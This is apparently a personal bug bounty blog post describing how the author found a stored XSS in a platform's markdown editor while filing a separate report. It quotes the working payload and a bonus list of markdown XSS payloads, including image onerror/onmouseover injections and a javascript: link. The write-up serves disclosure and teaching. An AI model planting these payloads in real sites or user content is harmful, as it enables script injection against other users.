Yeah! I got P2 in 1 minute - Stored XSS via Markdown Editor

Schopath
Schopath
Jul 2 · 2 min read

Hello! I want to tell about my “Bug Bounty” writeup “Stored XSS (Cross-Site Scripting)” and my lucky story, this is my fastest finding which has HIGH severity (P2).

I discovered P2 (Stored XSS) vulnerability when I reporting P4 (Denial of Service).

The idiom, said:
Kill two birds with one stone.


Okay, here we go!

## Steps to Reproduce:

1. Go to [Here](https://[REDACTED]/[REDACTED])...

While thinking of words to make reports, i remembered something and tried to create XSS payload in markdown editor (but I didn’t expect to be XSS).

At the end of my report, I added (XSS Payload):

Cheers,

[Schopath](https://schopath.ninja/"/onmouseover="alert(/schopath/)"/x="ZeroByte.ID)

Then, i submit my P4 report.


What the …

Boom! Gotcha!

Really? It work! and I still don’t believe it.
So many reports entered in that platform, only I tried this?


Debugger (F12)
View Source (CTRL + U)

Oh no, I’m just lucky kid


BONUS! Markdown XSS payloads:

Image:

![“ onmouseover=”alert(‘1337’);](https://img.uri/random.png)

![DESC](x”/onerror=”alert`/Oops/`)

Anchor/URL:

[BOOM](javascript:alert(document.domain))


Thank you for reading.

Schopath

Written by

Schopath

Beginner Cyber-Security Researcher at ZeroByte.ID. Indonesian Writer.